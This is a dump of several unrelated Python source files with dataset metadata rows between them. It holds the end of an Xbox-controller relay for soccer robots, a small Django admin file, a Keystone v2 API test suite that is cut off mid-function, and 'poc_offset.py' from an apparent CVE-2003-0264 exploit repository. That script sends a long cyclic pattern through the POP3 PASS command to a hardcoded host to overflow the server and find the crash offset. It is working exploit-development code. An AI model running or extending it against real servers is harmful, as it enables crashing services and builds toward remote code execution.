                        if delta > self.axis_threshold:
                            callbacks.add(ax.when_moved)
                            self.prev[event.axis] = event.value
                    elif event.type == pygame.JOYBUTTONDOWN:
                        button = buttons[event.button]
                        if not button.is_pressed:
                            callbacks.add(button.when_pressed)
                        button.is_pressed = True
                    elif event.type == pygame.JOYBUTTONUP:
                        button = buttons[event.button]
                        if button.is_pressed:
                            callbacks.add(button.when_released)
                        button.is_pressed = False
                    elif event.type == pygame.JOYHATMOTION:
                        pass # D-pad not supported
                    else:
                        raise Exception("cannot process joystick event: " + str(event))
                # fire all callbacks
                for f in callbacks:
                    f()
                # dump?
                if self.live_dump_mode:
                    print(self)
                # callback
                self.callback(self)
                # sleep until the next fixed-rate tick
                t += dt
                pause.until(t)
        except KeyboardInterrupt:
            pass
class xRelay:
    # Relays controller state to one robot via RTDB key
    # "JOYSTICK_CONTROL_<robotId>": velocity setpoints, ballhandler
    # enable, kicker height/power and an optional high-level action.
    def __init__(self, robotId, joystickIndex=0):
        # setup RTDB
        self.robotId = robotId # TODO: allow live toggle via select button?
        self.rtdb2Store = RtDB2Store(RTDB2_DEFAULT_PATH, False)
        self.rtdb2Store.refresh_rtdb_instances()
        # ballhandler enable/disable events
        # (starts False, then toggled once -> ballhandlers begin enabled)
        self.enable_bh = False
        self.toggle_bh()
        # setup controller callbacks
        self.controller = Xbox360Controller(joystickIndex)
        self.controller.button_b.when_pressed = self.toggle_bh
        self.controller.callback = self.process_state
        # motion limiters and timing
        self.xy_max_speed = 1.2
        self.xy_acceleration = 2.0
        self.xy_deadzone = 0.3
        self.vx = 0.0
        self.vy = 0.0
        self.rz_max_speed = 2.3
        self.rz_acceleration = 3.0
        self.rz_deadzone = 0.5
        self.vrz = 0.0
        # control period, derived from the controller polling frequency
        self.dt = 1.0 / self.controller.frequency
        # shooting
        self.rt = -1.0
        self.allow_lobshots = False
        self.shoot_power_min = 20
        self.shoot_power_max = 60
        self.shoot_power_scale = 60
        self.shoot_height_scale = 90
        self.shoot_height_max = 180
        # advanced actions
        self.action = ""
    def clip(self, v, lim):
        # Clamp v to the symmetric range [-lim, lim].
        return min(max(v, -lim), lim)
    def toggle_bh(self):
        # Flip ballhandler enable state and report the new state.
        self.enable_bh = not self.enable_bh
        print("ballHandlers " + ["off", "on"][self.enable_bh])
    def process_state(self, controller_state):
        # Per-cycle callback: convert controller state into velocity,
        # kicker and action setpoints and publish them to RTDB.
        # helper function, very basic motion controller
        def calc(current_setpoint, axis_input, speed_limit, acc_limit, deadzone):
            """
            Calculate new setpoint based on axis input, current setpoint and motion limiters.
            """
            target = axis_input * speed_limit
            if abs(target) < deadzone:
                return 0.0 # TODO: is abrupt braking OK?
            # ramp towards target, limited by acc_limit per cycle
            if target > current_setpoint:
                return min(current_setpoint + self.dt * acc_limit, target)
            return max(current_setpoint - self.dt * acc_limit, target)
        vx = calc(self.vx, controller_state.axis_ls.x, self.xy_max_speed, self.xy_acceleration, self.xy_deadzone)
        vy = calc(self.vy, -controller_state.axis_ls.y, self.xy_max_speed, self.xy_acceleration, self.xy_deadzone) # inverted axis!
        vrz = calc(self.vrz, -controller_state.axis_rs.x, self.rz_max_speed, self.rz_acceleration, self.rz_deadzone) # rz is defined counter-clockwise
        # only log when the formatted setpoint differs from all-zero
        v_string = "vx={:6.2f} vy={:6.2f} vrz={:6.2f}".format(vx, vy, vrz)
        v_zero = "vx={:6.2f} vy={:6.2f} vrz={:6.2f}".format(0, 0, 0)
        if v_string != v_zero:
            print("{:.3f} {}".format(time.time(), v_string))
        # store speed setpoints
        self.vx = float(vx)
        self.vy = float(vy)
        self.vrz = float(vrz)
        # kicker setpoints
        # map LT from [-1,1] to [0, shoot_height_scale], capped at max
        self.kicker_height = float(min((controller_state.axis_lt.x + 1.0) * 0.5 * self.shoot_height_scale, self.shoot_height_max))
        self.kicker_power = float(0.0)
        if not self.allow_lobshots:
            self.kicker_height = float(0.0)
        # shoot if RT is being released
        new_rt = controller_state.axis_rt.x
        if (new_rt < self.rt - 0.2):
            # kaboom!
            # TODO: check if we have the ball
            # power scales with how far RT was pulled, clamped to [min,max]
            self.kicker_power = float(min(max((self.rt + 1.0) * 0.5 * self.shoot_power_scale, self.shoot_power_min), self.shoot_power_max))
            print("shooting with height {:6.2f} and power {:6.2f}".format(self.kicker_height, self.kicker_power))
            self.rt = -1.0 # reset to avoid immediate reshoot
        else:
            self.rt = new_rt
        # check for special actions
        # (later checks win: Y overrides X overrides A when held together)
        self.action = ""
        if controller_state.button_a.is_pressed:
            self.action = "getBall"
        if controller_state.button_x.is_pressed:
            self.action = "passToTeamMember"
        if controller_state.button_y.is_pressed:
            self.action = "shootAtGoal"
        # serialize and put into RTDB
        item = [self.robotId, [self.vx, self.vy, self.vrz], self.enable_bh, self.kicker_height, self.kicker_power, self.action]
        self.rtdb2Store.put(0, "JOYSTICK_CONTROL_" + str(self.robotId), item)
        # shooting?
        if self.kicker_power > 0.0:
            time.sleep(0.5) # wait for ball to leave
    def run(self):
        # Blocks in the controller event loop until QUIT / Ctrl-C.
        self.controller.run()
def main(robotId, joystickIndex=0, dev_mode=False):
    """Relay joystick input to the given robot via RTDB.

    robotId       -- target robot number (part of the RTDB key name).
    joystickIndex -- which attached joystick to use (default: first).
    dev_mode      -- when True, skip RTDB entirely and just dump raw
                     controller state to stdout (replaces the previous
                     unreachable 'if 1: ... else:' developer branch).
    """
    if dev_mode:
        # dev mode: echo controller state change
        controller = Xbox360Controller()
        #controller.echo_onchange()
        controller.live_dump()
        controller.run()
    else:
        # RTDB relay (default behavior, unchanged)
        xRelay(robotId, joystickIndex).run()
if __name__ == "__main__":
    # Command-line entry point: parse arguments and start the relay.
    description = ('Control given robot using a XBOX controller.\n'
                   '(Or any other regular controller, tooling to be generalized.)\n')
    epilog = 'Example: driveByXbox360Controller.py 2\n'
    arg_parser = argparse.ArgumentParser(
        description=description,
        epilog=epilog,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    arg_parser.add_argument('-i', '--index', help='joystick index to use',
                            type=int, default=0)
    arg_parser.add_argument('robotId', help='target robot', type=int)
    cli_args = arg_parser.parse_args()
    # execute only if run as a script
    main(cli_args.robotId, cli_args.index)
| 43.993846 | 162 | 0.58099 |
acdfc7cfed01351b766dcec9b2b8f65c35ae43bf | 3,132 | py | Python | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | import socket
import sys
import time
print("[+] Initiating the Crash Now!\n")
buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3
Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 110))
s.recv(1024) #Recv the banner
#Enter the User
s.send('USER hacker\r\n')
s.recv(1024)
#Finally the vulnerable command PASS
s.send('PASS ' + buff + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(0.5)
print("[+] Done!")
| 111.857143 | 2,709 | 0.9553 |
acdfc8eeaed168ab0eab9d7e9fa11d126b5817b4 | 379 | py | Python | cvap/data/__init__.py | zhaoyanpeng/lvamodel | 93b06ff43ae6a76323cecea4c10cf457945c2711 | [
"MIT"
] | 6 | 2021-12-20T06:01:56.000Z | 2022-03-25T06:44:50.000Z | cvap/data/__init__.py | zhaoyanpeng/vipant | 93b06ff43ae6a76323cecea4c10cf457945c2711 | [
"MIT"
] | null | null | null | cvap/data/__init__.py | zhaoyanpeng/vipant | 93b06ff43ae6a76323cecea4c10cf457945c2711 | [
"MIT"
] | null | null | null | from .esc50 import build_xfold_dataloader_list
from .audio_text import build_audio_text_dataloader
from .image_text import build_image_text_dataloader
from .image_audio import build_image_audio_dataloader
from .audioset_clf import build_audioset_clf_dataloader
from .audioset_hub import (
build_audioset_dataloader,
build_audioset_label_map,
build_filter_set,
)
| 29.153846 | 55 | 0.852243 |
acdfc94830200e699189a1b8242c43c5926a0be0 | 358 | py | Python | pubsubat/pubsub/admin.py | zerobased-co/pubsub.at | c53ee698d3d2beced0147a8aa9707f69c3ef46c1 | [
"MIT"
] | null | null | null | pubsubat/pubsub/admin.py | zerobased-co/pubsub.at | c53ee698d3d2beced0147a8aa9707f69c3ef46c1 | [
"MIT"
] | null | null | null | pubsubat/pubsub/admin.py | zerobased-co/pubsub.at | c53ee698d3d2beced0147a8aa9707f69c3ef46c1 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django_summernote.admin import SummernoteModelAdmin
from .models import (User, Category, Publisher, Subscription, )
admin.site.register(User, UserAdmin)
admin.site.register(Category)
admin.site.register(Publisher, SummernoteModelAdmin)
admin.site.register(Subscription)
| 32.545455 | 63 | 0.837989 |
acdfca5f063c1299e5363b4b3022029577260a95 | 54,570 | py | Python | keystone/keystone/tests/unit/test_v2.py | sreenathmenon/openstackTFA | 8c765f2728b82cf78c4d2bfd5c6a36ebf9302f2b | [
"Apache-2.0"
] | null | null | null | keystone/keystone/tests/unit/test_v2.py | sreenathmenon/openstackTFA | 8c765f2728b82cf78c4d2bfd5c6a36ebf9302f2b | [
"Apache-2.0"
] | null | null | null | keystone/keystone/tests/unit/test_v2.py | sreenathmenon/openstackTFA | 8c765f2728b82cf78c4d2bfd5c6a36ebf9302f2b | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import time
import uuid
from keystoneclient.common import cms
from oslo_config import cfg
import six
from six.moves import http_client
from testtools import matchers
from keystone.common import extension as keystone_extension
from keystone.tests.unit import ksfixtures
from keystone.tests.unit import rest
CONF = cfg.CONF
class CoreApiTests(object):
    def assertValidError(self, error):
        """Check that an error body carries code, title and message."""
        self.assertIsNotNone(error.get('code'))
        self.assertIsNotNone(error.get('title'))
        self.assertIsNotNone(error.get('message'))

    def assertValidVersion(self, version):
        """Check the minimal fields of a version descriptor."""
        self.assertIsNotNone(version)
        self.assertIsNotNone(version.get('id'))
        self.assertIsNotNone(version.get('status'))
        self.assertIsNotNone(version.get('updated'))

    def assertValidExtension(self, extension):
        """Check the minimal fields of an extension descriptor."""
        self.assertIsNotNone(extension)
        self.assertIsNotNone(extension.get('name'))
        self.assertIsNotNone(extension.get('namespace'))
        self.assertIsNotNone(extension.get('alias'))
        self.assertIsNotNone(extension.get('updated'))

    def assertValidExtensionLink(self, link):
        """Check the minimal fields of an extension link."""
        self.assertIsNotNone(link.get('rel'))
        self.assertIsNotNone(link.get('type'))
        self.assertIsNotNone(link.get('href'))

    def assertValidTenant(self, tenant):
        """Check a v2 tenant: id and name set, no v3-only attributes."""
        self.assertIsNotNone(tenant.get('id'))
        self.assertIsNotNone(tenant.get('name'))
        # v3 attributes must not leak into the v2 representation
        self.assertNotIn('domain_id', tenant)
        self.assertNotIn('parent_id', tenant)

    def assertValidUser(self, user):
        """Check the minimal fields of a user reference."""
        self.assertIsNotNone(user.get('id'))
        self.assertIsNotNone(user.get('name'))

    def assertValidRole(self, tenant):
        """Check the minimal fields of a role reference."""
        # NOTE(review): the parameter is named 'tenant' but callers pass
        # a role dict; only id/name are checked so behavior is the same.
        self.assertIsNotNone(tenant.get('id'))
        self.assertIsNotNone(tenant.get('name'))
def test_public_not_found(self):
r = self.public_request(
path='/%s' % uuid.uuid4().hex,
expected_status=http_client.NOT_FOUND)
self.assertValidErrorResponse(r)
def test_admin_not_found(self):
r = self.admin_request(
path='/%s' % uuid.uuid4().hex,
expected_status=http_client.NOT_FOUND)
self.assertValidErrorResponse(r)
def test_public_multiple_choice(self):
r = self.public_request(path='/', expected_status=300)
self.assertValidMultipleChoiceResponse(r)
def test_admin_multiple_choice(self):
r = self.admin_request(path='/', expected_status=300)
self.assertValidMultipleChoiceResponse(r)
def test_public_version(self):
r = self.public_request(path='/v2.0/')
self.assertValidVersionResponse(r)
def test_admin_version(self):
r = self.admin_request(path='/v2.0/')
self.assertValidVersionResponse(r)
def test_public_extensions(self):
r = self.public_request(path='/v2.0/extensions')
self.assertValidExtensionListResponse(
r, keystone_extension.PUBLIC_EXTENSIONS)
def test_admin_extensions(self):
r = self.admin_request(path='/v2.0/extensions')
self.assertValidExtensionListResponse(
r, keystone_extension.ADMIN_EXTENSIONS)
def test_admin_extensions_404(self):
self.admin_request(path='/v2.0/extensions/invalid-extension',
expected_status=http_client.NOT_FOUND)
def test_public_osksadm_extension_404(self):
self.public_request(path='/v2.0/extensions/OS-KSADM',
expected_status=http_client.NOT_FOUND)
def test_admin_osksadm_extension(self):
r = self.admin_request(path='/v2.0/extensions/OS-KSADM')
self.assertValidExtensionResponse(
r, keystone_extension.ADMIN_EXTENSIONS)
def test_authenticate(self):
r = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'passwordCredentials': {
'username': self.user_foo['name'],
'password': self.user_foo['password'],
},
'tenantId': self.tenant_bar['id'],
},
},
expected_status=200)
self.assertValidAuthenticationResponse(r, require_service_catalog=True)
def test_authenticate_unscoped(self):
r = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'passwordCredentials': {
'username': self.user_foo['name'],
'password': self.user_foo['password'],
},
},
},
expected_status=200)
self.assertValidAuthenticationResponse(r)
def test_get_tenants_for_token(self):
r = self.public_request(path='/v2.0/tenants',
token=self.get_scoped_token())
self.assertValidTenantListResponse(r)
def test_validate_token(self):
token = self.get_scoped_token()
r = self.admin_request(
path='/v2.0/tokens/%(token_id)s' % {
'token_id': token,
},
token=token)
self.assertValidAuthenticationResponse(r)
def test_invalid_token_404(self):
token = self.get_scoped_token()
self.admin_request(
path='/v2.0/tokens/%(token_id)s' % {
'token_id': 'invalid',
},
token=token,
expected_status=http_client.NOT_FOUND)
def test_validate_token_service_role(self):
self.md_foobar = self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'],
self.tenant_service['id'],
self.role_service['id'])
token = self.get_scoped_token(tenant_id='service')
r = self.admin_request(
path='/v2.0/tokens/%s' % token,
token=token)
self.assertValidAuthenticationResponse(r)
def test_remove_role_revokes_token(self):
self.md_foobar = self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'],
self.tenant_service['id'],
self.role_service['id'])
token = self.get_scoped_token(tenant_id='service')
r = self.admin_request(
path='/v2.0/tokens/%s' % token,
token=token)
self.assertValidAuthenticationResponse(r)
self.assignment_api.remove_role_from_user_and_project(
self.user_foo['id'],
self.tenant_service['id'],
self.role_service['id'])
r = self.admin_request(
path='/v2.0/tokens/%s' % token,
token=token,
expected_status=http_client.UNAUTHORIZED)
def test_validate_token_belongs_to(self):
token = self.get_scoped_token()
path = ('/v2.0/tokens/%s?belongsTo=%s' % (token,
self.tenant_bar['id']))
r = self.admin_request(path=path, token=token)
self.assertValidAuthenticationResponse(r, require_service_catalog=True)
def test_validate_token_no_belongs_to_still_returns_catalog(self):
token = self.get_scoped_token()
path = ('/v2.0/tokens/%s' % token)
r = self.admin_request(path=path, token=token)
self.assertValidAuthenticationResponse(r, require_service_catalog=True)
def test_validate_token_head(self):
"""The same call as above, except using HEAD.
There's no response to validate here, but this is included for the
sake of completely covering the core API.
"""
token = self.get_scoped_token()
self.admin_request(
method='HEAD',
path='/v2.0/tokens/%(token_id)s' % {
'token_id': token,
},
token=token,
expected_status=200)
    def test_endpoints(self):
        """A token's endpoint list is available on the admin API."""
        token = self.get_scoped_token()
        r = self.admin_request(
            path='/v2.0/tokens/%(token_id)s/endpoints' % {
                'token_id': token,
            },
            token=token)
        self.assertValidEndpointListResponse(r)

    def test_get_tenant(self):
        """A tenant can be fetched by id."""
        token = self.get_scoped_token()
        r = self.admin_request(
            path='/v2.0/tenants/%(tenant_id)s' % {
                'tenant_id': self.tenant_bar['id'],
            },
            token=token)
        self.assertValidTenantResponse(r)

    def test_get_tenant_by_name(self):
        """A tenant can be fetched via the name query filter."""
        token = self.get_scoped_token()
        r = self.admin_request(
            path='/v2.0/tenants?name=%(tenant_name)s' % {
                'tenant_name': self.tenant_bar['name'],
            },
            token=token)
        self.assertValidTenantResponse(r)

    def test_get_user_roles_with_tenant(self):
        """A user's roles on a specific tenant can be listed."""
        token = self.get_scoped_token()
        r = self.admin_request(
            path='/v2.0/tenants/%(tenant_id)s/users/%(user_id)s/roles' % {
                'tenant_id': self.tenant_bar['id'],
                'user_id': self.user_foo['id'],
            },
            token=token)
        self.assertValidRoleListResponse(r)

    def test_get_user(self):
        """A user can be fetched by id."""
        token = self.get_scoped_token()
        r = self.admin_request(
            path='/v2.0/users/%(user_id)s' % {
                'user_id': self.user_foo['id'],
            },
            token=token)
        self.assertValidUserResponse(r)

    def test_get_user_by_name(self):
        """A user can be fetched via the name query filter."""
        token = self.get_scoped_token()
        r = self.admin_request(
            path='/v2.0/users?name=%(user_name)s' % {
                'user_name': self.user_foo['name'],
            },
            token=token)
        self.assertValidUserResponse(r)
def test_create_update_user_invalid_enabled_type(self):
# Enforce usage of boolean for 'enabled' field
token = self.get_scoped_token()
# Test CREATE request
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'enabled': "False",
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
r = self.admin_request(
method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
# In JSON, 0|1 are not booleans
'enabled': 0,
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
# Test UPDATE request
path = '/v2.0/users/%(user_id)s' % {
'user_id': self.user_foo['id'],
}
r = self.admin_request(
method='PUT',
path=path,
body={
'user': {
'enabled': "False",
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
r = self.admin_request(
method='PUT',
path=path,
body={
'user': {
# In JSON, 0|1 are not booleans
'enabled': 1,
},
},
token=token,
expected_status=http_client.BAD_REQUEST)
self.assertValidErrorResponse(r)
def test_create_update_user_valid_enabled_type(self):
# Enforce usage of boolean for 'enabled' field
token = self.get_scoped_token()
# Test CREATE request
self.admin_request(method='POST',
path='/v2.0/users',
body={
'user': {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'enabled': False,
},
},
token=token,
expected_status=200)
    def test_error_response(self):
        """This triggers assertValidErrorResponse by convention."""
        self.public_request(path='/v2.0/tenants',
                            expected_status=http_client.UNAUTHORIZED)

    def test_invalid_parameter_error_response(self):
        """Unexpected top-level body keys yield a 400 error response."""
        token = self.get_scoped_token()
        # deliberately-misnamed top-level key in the request body
        bad_body = {
            'OS-KSADM:service%s' % uuid.uuid4().hex: {
                'name': uuid.uuid4().hex,
                'type': uuid.uuid4().hex,
            },
        }
        res = self.admin_request(method='POST',
                                 path='/v2.0/OS-KSADM/services',
                                 body=bad_body,
                                 token=token,
                                 expected_status=http_client.BAD_REQUEST)
        self.assertValidErrorResponse(res)
        res = self.admin_request(method='POST',
                                 path='/v2.0/users',
                                 body=bad_body,
                                 token=token,
                                 expected_status=http_client.BAD_REQUEST)
        self.assertValidErrorResponse(res)
    def _get_user_id(self, r):
        """Helper method to return user ID from a response.

        This needs to be overridden by child classes
        based on their content type.
        """
        raise NotImplementedError()

    def _get_role_id(self, r):
        """Helper method to return a role ID from a response.

        This needs to be overridden by child classes
        based on their content type.
        """
        raise NotImplementedError()

    def _get_role_name(self, r):
        """Helper method to return role NAME from a response.

        This needs to be overridden by child classes
        based on their content type.
        """
        raise NotImplementedError()

    def _get_project_id(self, r):
        """Helper method to return project ID from a response.

        This needs to be overridden by child classes
        based on their content type.
        """
        raise NotImplementedError()

    def assertNoRoles(self, r):
        """Helper method to assert No Roles.

        This needs to be overridden by child classes
        based on their content type.
        """
        raise NotImplementedError()
def test_update_user_tenant(self):
    """Changing a user's tenantId moves the default member role.

    Flow: create a user in tenant_bar, verify the member role landed
    there, create a second tenant, re-point the user at it, then verify
    the role exists on the new tenant and is gone from the old one.
    """
    token = self.get_scoped_token()

    # Create a new user
    r = self.admin_request(
        method='POST',
        path='/v2.0/users',
        body={
            'user': {
                'name': uuid.uuid4().hex,
                'password': uuid.uuid4().hex,
                'tenantId': self.tenant_bar['id'],
                'enabled': True,
            },
        },
        token=token,
        expected_status=200)

    user_id = self._get_user_id(r.result)

    # Check if member_role is in tenant_bar
    r = self.admin_request(
        path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
            'project_id': self.tenant_bar['id'],
            'user_id': user_id
        },
        token=token,
        expected_status=200)
    self.assertEqual(CONF.member_role_name, self._get_role_name(r.result))

    # Create a new tenant
    r = self.admin_request(
        method='POST',
        path='/v2.0/tenants',
        body={
            'tenant': {
                'name': 'test_update_user',
                'description': 'A description ...',
                'enabled': True,
            },
        },
        token=token,
        expected_status=200)

    project_id = self._get_project_id(r.result)

    # Update user's tenant
    r = self.admin_request(
        method='PUT',
        path='/v2.0/users/%(user_id)s' % {
            'user_id': user_id,
        },
        body={
            'user': {
                'tenantId': project_id,
            },
        },
        token=token,
        expected_status=200)

    # 'member_role' should be in new_tenant
    r = self.admin_request(
        path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
            'project_id': project_id,
            'user_id': user_id
        },
        token=token,
        expected_status=200)
    self.assertEqual('_member_', self._get_role_name(r.result))

    # 'member_role' should not be in tenant_bar any more
    r = self.admin_request(
        path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
            'project_id': self.tenant_bar['id'],
            'user_id': user_id
        },
        token=token,
        expected_status=200)
    self.assertNoRoles(r.result)
def test_update_user_with_invalid_tenant(self):
    """Updating a user to point at a nonexistent tenant returns 404."""
    token = self.get_scoped_token()

    # Create a user that starts out in tenant_bar.
    create_body = {
        'user': {
            'name': 'test_invalid_tenant',
            'password': uuid.uuid4().hex,
            'tenantId': self.tenant_bar['id'],
            'enabled': True,
        },
    }
    resp = self.admin_request(method='POST',
                              path='/v2.0/users',
                              body=create_body,
                              token=token,
                              expected_status=200)
    user_id = self._get_user_id(resp.result)

    # Re-point the user at a tenant ID that does not exist.
    update_body = {
        'user': {
            'tenantId': 'abcde12345heha',
        },
    }
    resp = self.admin_request(method='PUT',
                              path='/v2.0/users/%s' % user_id,
                              body=update_body,
                              token=token,
                              expected_status=http_client.NOT_FOUND)
def test_update_user_with_invalid_tenant_no_prev_tenant(self):
    """Updating a tenant-less user to a nonexistent tenant returns 404."""
    token = self.get_scoped_token()

    # Create a new user (note: no tenantId in the body)
    r = self.admin_request(
        method='POST',
